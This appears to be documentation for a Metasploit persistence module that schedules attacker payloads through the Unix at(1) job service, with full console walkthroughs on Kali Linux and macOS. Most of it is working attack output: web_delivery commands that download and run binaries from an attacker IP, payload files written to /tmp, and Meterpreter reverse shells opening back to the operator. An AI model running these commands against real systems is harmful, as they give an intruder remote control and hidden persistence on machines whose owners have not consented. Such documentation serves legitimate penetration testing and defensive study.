metasploit-gs/documentation/modules/exploit/multi/persistence/at.md

## Vulnerable Application

This module executes a metasploit payload utilizing `at(1)` to execute jobs at a specific time.  It should work out of the box
with any UNIX-like operating system with `atd` running.

Verified on Kali linux and OSX 13.7.4

### OSX

In the case of OS X, the `atrun` service must be launched:

```
sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist
```

### Kali

`at` isn't installed by default. `sudo apt-get install at`.

## Verification Steps

1. Start msfconsole
2. Exploit a box via whatever method
3. Do: `use exploit/multi/persistence/at`
4. Do: `set session #`
5. `exploit`


## Options

 ### TIME

  When to run job via `at(1)`.  Conforms to timespec. Examples can be found in the module's references.

## Scenarios

### Kali Linux

Initial access vector via web delivery

```
[*] Processing /home/mtcyr/.msf4/msfconsole.rc for ERB directives.
resource (/home/mtcyr/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/home/mtcyr/.msf4/msfconsole.rc)> setg lhost 192.168.10.144
lhost => 192.168.10.144
resource (/home/mtcyr/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/home/mtcyr/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/home/mtcyr/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/home/mtcyr/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/home/mtcyr/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/home/mtcyr/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 192.168.10.144:4545 
[*] Using URL: http://192.168.10.144:8181/PaulWjhBSpRlqAz
[*] Server started.
[*] Run the following command on the target machine:
wget -qO o20dAbhk --no-check-certificate http://192.168.10.144:8181/PaulWjhBSpRlqAz; chmod +x o20dAbhk; ./o20dAbhk& disown
[msf](Jobs:2 Agents:0) exploit(multi/script/web_delivery) > 
[*] 192.168.10.144   web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.10.144
[*] Meterpreter session 1 opened (192.168.10.144:4545 -> 192.168.10.144:42442) at 2025-02-06 11:40:00 -0500
[msf](Jobs:2 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/tmp) > sysinfo
Computer     : 192.168.10.144
OS           : Debian  (Linux 6.11.2-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
(Meterpreter 1)(/tmp) > background
[*] Backgrounding session 1...
```

Persistence

```
[msf](Jobs:2 Agents:1) exploit(multi/script/web_delivery) > use exploit/multi/persistence/at 
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > set time "now +10 minutes"
time => now +10 minutes
[msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > set session 1
session => 1
[msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > exploit
[*] Command to run on remote host: curl -so ./tmoAoATss http://192.168.10.144:8080/aZRe4yWUN3U2-lDtdsaGlA;chmod +x ./tmoAoATss;./tmoAoATss&
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[msf](Jobs:3 Agents:1) exploit(multi/persistence/at) > [*] Fetch handler listening on 192.168.10.144:8080
[*] HTTP server started
[*] Adding resource /aZRe4yWUN3U2-lDtdsaGlA
[*] Started reverse TCP handler on 192.168.10.144:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. at(1) confirmed to be usable as a persistence mechanism
[*] Writing payload to /tmp//YneHFC
[*] Waiting for execution
[*] Meterpreter-compatible Cleaup RC file: /home/mtcyr/.msf4/logs/persistence/192.168.10.144_20250206.4241/192.168.10.144_20250206.4241.rc
[msf](Jobs:3 Agents:1) exploit(multi/persistence/at) > date
[*] exec: date
Thu Feb  6 11:42:44 AM EST 2025
[msf](Jobs:3 Agents:1) exploit(multi/persistence/at) > 
[*] Client 192.168.10.144 requested /aZRe4yWUN3U2-lDtdsaGlA
[*] Sending payload to 192.168.10.144 (curl/8.11.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.10.144
[*] Meterpreter session 2 opened (192.168.10.144:4444 -> 192.168.10.144:36212) at 2025-02-06 11:52:00 -0500
[msf](Jobs:3 Agents:2) exploit(multi/persistence/at) > date
[*] exec: date
Thu Feb  6 11:52:20 AM EST 2025
```

### OSX 13.7.4

Initial access vector via web delivery

```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 8
target => 8
resource (/root/.msf4/msfconsole.rc)> set srvport 8383
srvport => 8383
resource (/root/.msf4/msfconsole.rc)> set payload payload/osx/x64/meterpreter_reverse_tcp
payload => osx/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4747
lport => 4747
resource (/root/.msf4/msfconsole.rc)> set URIPATH m
URIPATH => m
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4747 
[*] Using URL: http://111.111.1.111:8383/m
[*] Server started.
[*] Run the following command on the target machine:
curl -sk --output y9D7PFJd http://111.111.1.111:8383/m; chmod +x y9D7PFJd; ./y9D7PFJd& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > [*] Meterpreter session 1 opened (111.111.1.111:4747 -> 222.22.2.2:49164) at 2025-02-21 16:59:10 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/multi/persistence/at 
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:2 Agents:2) exploit(multi/persistence/at) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/Users/macos) > getuid
Server username: macos
(Meterpreter 1)(/Users/macos) > sysinfo
Computer     : 20.20.20.21
OS           : macOS Ventura (macOS 13.7.4)
Architecture : x86
BuildTuple   : x86_64-apple-darwin
Meterpreter  : x64/osx
(Meterpreter 1)(/Users/macos) > 
```

Persistence

Already run: `sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist`

```
[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > set time now +2 minutes
time => now +2 minutes
[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > set payload payload/osx/x64/meterpreter_reverse_tcp
payload => osx/x64/meterpreter_reverse_tcp
[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > 
[*] Started reverse TCP handler on 111.111.1.111:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. at(1) confirmed to be usable as a persistence mechanism
[*] Writing payload to /tmp/NBcqC
[*] Writing '/tmp/NBcqC' (25 bytes) ...
[*] Writing '/tmp/NBcqCmk' (815032 bytes) ...
[+] at job created with id: 7
[*] Waiting up to sec for execution
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/20.20.20.21_20250221.0028/20.20.20.21_20250221.0028.rc
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.22.2.2:49165) at 2025-02-21 17:02:29 -0500
```